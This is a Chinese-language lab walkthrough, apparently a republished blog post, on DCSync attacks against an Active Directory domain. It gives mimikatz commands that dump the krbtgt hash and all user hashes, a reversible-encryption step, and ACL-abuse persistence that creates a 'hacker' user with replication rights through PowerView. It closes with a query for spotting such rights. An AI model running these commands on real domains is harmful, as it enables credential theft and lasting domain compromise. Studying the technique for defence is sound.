域凭据获取——DCSync
https://i-blog.csdnimg.cn/direct/f825a313015c468f9267482a128beac9.png#pic_center攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138
一、DCSync简介
在一个大型网络中往往存在多台域控制器(DC),每台DC都需要保持最新的凭据,而保持最新凭据的方法就是在各个域控制器之间举行数据共享,共享用户凭据、安全形貌符等域内变动信息。于是微软推出了目录复礼服务,这个服务让域控制器可以在其他域控制器举行任何修改时举行更新。例如,DC1新增了一个名为test的域用户,那么DC2就可以通过该服务的自身同步功能同时更新test用户。
DCSync就是伪装域控制器并利用DSGetNCChanges函数来哀求其他域控制器获取域内的用户凭据。DCSync攻击已经被集成到mimikatz中,在利用DCSync时mimikatz会自动模仿域控制器,并要求其他域控制器利用Microsoft目录复礼服务远程协议(MS-DRSR)来获取域内用户凭据,它可以通过这些手段要求其他域控制器将NTDS.DIT信息同步给自身模仿的域控制器。特殊注意:对于这些操纵,无需在域控制器上执行任何一条下令。
二、利用DCSync获取域内用户哈希
执行DCSync攻击的域用户必须具有复制目录更改所有项权限(Replicating Directory Changes All)和复制目录更改权限(Replicating Directory Changes),而在域内默认拥有有两种权限的用户如下:
[*]域控制器本地管理员组
[*]域管理员组
[*]企业管理员组
[*]域控制器盘算机账户
1、这里win 7作为域内主机,同时利用域内成员god\test登录win 7;该域成员并非域管理员,但在域内拥有“复制目录更改”和“复制目录更改所有项”权限。
在AD管理中心点击域的属性;
https://i-blog.csdnimg.cn/direct/dae01b2bb9fc471faf3db489018fa0c5.png#pic_center
先添加当前域成员,在授权相应的权限。
https://i-blog.csdnimg.cn/direct/f2e793973c9d418d8a1207e7b119938c.png#pic_center
2、利用该用户执行mimikatz的DCSync功能以获取指定域成员哈希。这里实验获取krbtgt用户的凭据,该用户是获取黄金票据是的紧张用户。下令如下:
# 获取域内krbtgt用户的哈希
mimikatz.exe "lsadump::dcsync /domain:god.org /user:krbtgt" exit
https://i-blog.csdnimg.cn/direct/4c1e38a455ee40cb9c953dec5af77f74.png#pic_center
3、获取域内所有用户的哈希
# 获取域内所有用户的哈希
mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit
https://i-blog.csdnimg.cn/direct/4deab449570946b78e9af8470f7acda9.png#pic_center
三、DCSync可逆加密利用(没搞定)
当用户账号设置ReverseiblePasswordEncryption(可逆加密)属性后,攻击者可以直接获取该用户的明文暗码。前提是该域用户在设置可逆加密属性后修改过暗码
# 为test域用户设置可逆加密属性
Set-ADUser test -AllowReversiblePasswordEncryption $true
老是报错
https://i-blog.csdnimg.cn/direct/5075857353ce4406ae8b5ccf4729327e.png#pic_center
设置该属性后,利用mimikatz获取该域用户的明文暗码。
lsadump::dcsync /domain:god.org /user:test
四、域外利用DCSync获取域用户哈希(待完成)
待完成。
五、利用ACL滥用举行DCSync持久化
如果想举行DCSync攻击,所用的账号需要有DS-Replication-Get-Changes、DS-Replication-Get-Changes-All这两个权限。DCSync攻击可用于持久化工作中。
下面的实验是在域控win server 2008上完成,假设已经拿到域管的账号暗码。下一步举行权限维持。
1、执行下面的下令新建一个域用户,并赋予“复制目录更改”和“复制目录更改所有项”两个权限。
# 域内新建用户
# net user <username> <password> /add /domain
net user hacker admin123. /add /domain
# 域内删除用户
# net user <username> /del /domain
net user hacker /del /domain
https://i-blog.csdnimg.cn/direct/f841139403eb4b41b79c1bb83dfd11a8.png#pic_center
import-module .\Powerview.ps1 # 导入Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "DC=god,DC=org" -PrincipalIdentity hacker -Rights DCSync -Verbose
# DC=god,DC=org:代表god.org,即域名
# -PrincipalIdentity:指定所需添加到域的用户名
# -Rights:指定需要获取的权限
# -Verbose:显示详细运行信息
https://i-blog.csdnimg.cn/direct/ffac71aab60e49bfb4ab8618bbbcada5.png#pic_center
https://i-blog.csdnimg.cn/direct/75068911e4ae40aba8d0f30ec54b708a.png#pic_center
2、利用god\hacker登录域内呆板,并举行DCSync攻击。
mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit
https://i-blog.csdnimg.cn/direct/742a179e36d04855a3803749acad2bea.png#pic_center
3、如果想要查询域内哪些用户拥有“复制目录更改”和“复制目录更改所有项”两个权限。利用如下下令(下图实在域控上执行的,管理员打开powershell):
# 获取拥有“复制目录更改”和“复制目录更改所有项”两个权限的用户
import-module .\Powerview.ps1 # 导入Powerview.ps1
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectAceType -match "DS-Replication-Get-Changes"} # 需要域管账号
https://i-blog.csdnimg.cn/direct/d161e6f03586411e94850cd3602a9eb4.png#pic_center
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]